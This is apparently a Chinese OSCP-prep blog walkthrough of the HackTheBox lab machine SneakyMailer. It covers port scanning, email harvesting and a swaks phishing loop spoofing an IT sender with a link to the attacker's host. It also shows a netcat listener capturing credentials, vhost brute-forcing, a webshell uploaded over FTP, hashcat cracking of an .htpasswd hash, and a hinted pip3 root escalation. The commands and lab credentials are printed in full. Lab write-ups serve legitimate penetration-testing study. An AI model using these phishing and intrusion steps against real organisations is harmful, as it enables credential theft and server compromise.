OSCP备考_0x31_HackThBox靶机_SneakyMailer

Ethan医生2个月前靶场81


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.196.68 (扫描TCP)


image.png


nmap -sU --top-ports 100 10.129.196.68  (扫描UDP)

image.png

依照80端口提示需要绑定HOST

http://sneakycorp.htb

image.png


curl -i http://sneakycorp.htb/team.php > email.txt

将页面内容下载下来

cat email.txt |grep "@" | cut -d '>' -f2  | cut -d '<' -f1 > out.txt

image.png

并将email收集起来

使用SMTP

while read mail; do
    swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials /Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197;
  done < email.txt
  工具: 使用swaks(瑞士军刀SMTP工具)发送邮件
  收件人列表: 从email.txt文件中逐行读取邮箱地址
  发件人: 伪装成it@sneakymailer.htb
  主题: "Credentials /Errors" - 利用凭证或错误提示引起关注
  正文内容: 包含一个指向攻击者控制服务器(10.10.14.4)的链接
  SMTP服务器: 使用目标组织的邮件服务器(10.10.10.197)发送

nc -lvnp 80

image.png

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

内容解码后

1
2
3
4
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
UserName : paulbyrd
email : paulbyrd@sneakymailer.htb
password : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

使用 evolution

连接邮箱

image.png

Username: developer

Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C



gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -u sneakycorp.htb子域名爆破

找到一个dev的域名


http://dev.sneakycorp.htb/

image.png




FTP get webshell

上面得到的developer账号密码可以用于FTP,进去是一个dev目录,应该就是前面dev子域名的代码,我们可以直接传webshell:

image.png

上传后门到FTP挡案下

put p_ec.php,访问后门直接拿下shell

image.png


image.png

cd /var/www

pypi底下还有个子域名

image.png

pypi.sneakycorp.htb

在/var/www发现pypi.sneakycorp.htb,把这个也加到hosts访问, 注意直接访问是重定向到主站,需要8080端口:



.htpasswd

pypi目录有个.htpasswd文件,hashcat解出来pypi密码:

cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

pypi: soufianeelhaoui

PyPI

现在我们有pypi的密码,就可以上传恶意的package执行代码,参考:

sudo -l 

可以无需密码,以root权限运行/usr/bin/pip3,那基本就是通过pip3安装恶意模块

标签: OSCP

相关文章

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.57.118 (扫描TCP)nmap -sU --top-ports 100 10.129.57....

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x49_HackThBox靶机_Windows_Bankrobber

OSCP备考_0x49_HackThBox靶机_Windows_Bankrobber

Bankrobbernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.109 (扫描TCP)80存在apache,所以我们要关注p...

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...

OSCP备考_0x47_HackThBox靶机_Windows_conceal

OSCP备考_0x47_HackThBox靶机_Windows_conceal

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.122 (扫描TCP)我们普通的tcp啥都没有,所以考虑udp扫描当然也有可能是...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。